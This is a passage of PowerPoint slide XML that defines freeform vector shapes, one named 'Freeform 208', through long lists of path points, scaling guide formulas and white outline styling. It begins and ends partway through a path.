                      <a:pt x="40" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="43"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36075" name="Freeform 208"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3061" y="2068"/>
                <a:ext cx="149" cy="104"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 149"/>
                  <a:gd name="T1" fmla="*/ 50 h 104"/>
                  <a:gd name="T2" fmla="*/ 9 w 149"/>
                  <a:gd name="T3" fmla="*/ 49 h 104"/>
                  <a:gd name="T4" fmla="*/ 17 w 149"/>
                  <a:gd name="T5" fmla="*/ 41 h 104"/>
                  <a:gd name="T6" fmla="*/ 28 w 149"/>
                  <a:gd name="T7" fmla="*/ 17 h 104"/>
                  <a:gd name="T8" fmla="*/ 40 w 149"/>
                  <a:gd name="T9" fmla="*/ 10 h 104"/>
                  <a:gd name="T10" fmla="*/ 45 w 149"/>
                  <a:gd name="T11" fmla="*/ 6 h 104"/>
                  <a:gd name="T12" fmla="*/ 52 w 149"/>
                  <a:gd name="T13" fmla="*/ 6 h 104"/>
                  <a:gd name="T14" fmla="*/ 67 w 149"/>
                  <a:gd name="T15" fmla="*/ 8 h 104"/>
                  <a:gd name="T16" fmla="*/ 69 w 149"/>
                  <a:gd name="T17" fmla="*/ 10 h 104"/>
                  <a:gd name="T18" fmla="*/ 73 w 149"/>
                  <a:gd name="T19" fmla="*/ 13 h 104"/>
                  <a:gd name="T20" fmla="*/ 77 w 149"/>
                  <a:gd name="T21" fmla="*/ 11 h 104"/>
                  <a:gd name="T22" fmla="*/ 93 w 149"/>
                  <a:gd name="T23" fmla="*/ 7 h 104"/>
                  <a:gd name="T24" fmla="*/ 96 w 149"/>
                  <a:gd name="T25" fmla="*/ 1 h 104"/>
                  <a:gd name="T26" fmla="*/ 102 w 149"/>
                  <a:gd name="T27" fmla="*/ 0 h 104"/>
                  <a:gd name="T28" fmla="*/ 112 w 149"/>
                  <a:gd name="T29" fmla="*/ 15 h 104"/>
                  <a:gd name="T30" fmla="*/ 124 w 149"/>
                  <a:gd name="T31" fmla="*/ 29 h 104"/>
                  <a:gd name="T32" fmla="*/ 126 w 149"/>
                  <a:gd name="T33" fmla="*/ 43 h 104"/>
                  <a:gd name="T34" fmla="*/ 124 w 149"/>
                  <a:gd name="T35" fmla="*/ 58 h 104"/>
                  <a:gd name="T36" fmla="*/ 123 w 149"/>
                  <a:gd name="T37" fmla="*/ 62 h 104"/>
                  <a:gd name="T38" fmla="*/ 125 w 149"/>
                  <a:gd name="T39" fmla="*/ 65 h 104"/>
                  <a:gd name="T40" fmla="*/ 127 w 149"/>
                  <a:gd name="T41" fmla="*/ 65 h 104"/>
                  <a:gd name="T42" fmla="*/ 130 w 149"/>
                  <a:gd name="T43" fmla="*/ 69 h 104"/>
                  <a:gd name="T44" fmla="*/ 135 w 149"/>
                  <a:gd name="T45" fmla="*/ 68 h 104"/>
                  <a:gd name="T46" fmla="*/ 143 w 149"/>
                  <a:gd name="T47" fmla="*/ 65 h 104"/>
                  <a:gd name="T48" fmla="*/ 149 w 149"/>
                  <a:gd name="T49" fmla="*/ 67 h 104"/>
                  <a:gd name="T50" fmla="*/ 147 w 149"/>
                  <a:gd name="T51" fmla="*/ 74 h 104"/>
                  <a:gd name="T52" fmla="*/ 142 w 149"/>
                  <a:gd name="T53" fmla="*/ 78 h 104"/>
                  <a:gd name="T54" fmla="*/ 137 w 149"/>
                  <a:gd name="T55" fmla="*/ 81 h 104"/>
                  <a:gd name="T56" fmla="*/ 131 w 149"/>
                  <a:gd name="T57" fmla="*/ 94 h 104"/>
                  <a:gd name="T58" fmla="*/ 130 w 149"/>
                  <a:gd name="T59" fmla="*/ 104 h 104"/>
                  <a:gd name="T60" fmla="*/ 116 w 149"/>
                  <a:gd name="T61" fmla="*/ 99 h 104"/>
                  <a:gd name="T62" fmla="*/ 110 w 149"/>
                  <a:gd name="T63" fmla="*/ 96 h 104"/>
                  <a:gd name="T64" fmla="*/ 101 w 149"/>
                  <a:gd name="T65" fmla="*/ 92 h 104"/>
                  <a:gd name="T66" fmla="*/ 83 w 149"/>
                  <a:gd name="T67" fmla="*/ 102 h 104"/>
                  <a:gd name="T68" fmla="*/ 71 w 149"/>
                  <a:gd name="T69" fmla="*/ 99 h 104"/>
                  <a:gd name="T70" fmla="*/ 64 w 149"/>
                  <a:gd name="T71" fmla="*/ 102 h 104"/>
                  <a:gd name="T72" fmla="*/ 53 w 149"/>
                  <a:gd name="T73" fmla="*/ 98 h 104"/>
                  <a:gd name="T74" fmla="*/ 44 w 149"/>
                  <a:gd name="T75" fmla="*/ 100 h 104"/>
                  <a:gd name="T76" fmla="*/ 42 w 149"/>
                  <a:gd name="T77" fmla="*/ 98 h 104"/>
                  <a:gd name="T78" fmla="*/ 41 w 149"/>
                  <a:gd name="T79" fmla="*/ 94 h 104"/>
                  <a:gd name="T80" fmla="*/ 35 w 149"/>
                  <a:gd name="T81" fmla="*/ 90 h 104"/>
                  <a:gd name="T82" fmla="*/ 37 w 149"/>
                  <a:gd name="T83" fmla="*/ 85 h 104"/>
                  <a:gd name="T84" fmla="*/ 38 w 149"/>
                  <a:gd name="T85" fmla="*/ 84 h 104"/>
                  <a:gd name="T86" fmla="*/ 32 w 149"/>
                  <a:gd name="T87" fmla="*/ 83 h 104"/>
                  <a:gd name="T88" fmla="*/ 29 w 149"/>
                  <a:gd name="T89" fmla="*/ 87 h 104"/>
                  <a:gd name="T90" fmla="*/ 25 w 149"/>
                  <a:gd name="T91" fmla="*/ 83 h 104"/>
                  <a:gd name="T92" fmla="*/ 21 w 149"/>
                  <a:gd name="T93" fmla="*/ 80 h 104"/>
                  <a:gd name="T94" fmla="*/ 17 w 149"/>
                  <a:gd name="T95" fmla="*/ 80 h 104"/>
                  <a:gd name="T96" fmla="*/ 18 w 149"/>
                  <a:gd name="T97" fmla="*/ 77 h 104"/>
                  <a:gd name="T98" fmla="*/ 18 w 149"/>
                  <a:gd name="T99" fmla="*/ 76 h 104"/>
                  <a:gd name="T100" fmla="*/ 18 w 149"/>
                  <a:gd name="T101" fmla="*/ 74 h 104"/>
                  <a:gd name="T102" fmla="*/ 19 w 149"/>
                  <a:gd name="T103" fmla="*/ 71 h 104"/>
                  <a:gd name="T104" fmla="*/ 12 w 149"/>
                  <a:gd name="T105" fmla="*/ 68 h 104"/>
                  <a:gd name="T106" fmla="*/ 8 w 149"/>
                  <a:gd name="T107" fmla="*/ 63 h 104"/>
                  <a:gd name="T108" fmla="*/ 7 w 149"/>
                  <a:gd name="T109" fmla="*/ 58 h 104"/>
                  <a:gd name="T110" fmla="*/ 5 w 149"/>
                  <a:gd name="T111" fmla="*/ 55 h 104"/>
                  <a:gd name="T112" fmla="*/ 0 w 149"/>
                  <a:gd name="T113" fmla="*/ 50 h 104"/>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49"/>
                  <a:gd name="T172" fmla="*/ 0 h 104"/>
                  <a:gd name="T173" fmla="*/ 149 w 149"/>
                  <a:gd name="T174" fmla="*/ 104 h 104"/>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49" h="104">
                    <a:moveTo>
                      <a:pt x="0" y="50"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="70"/>
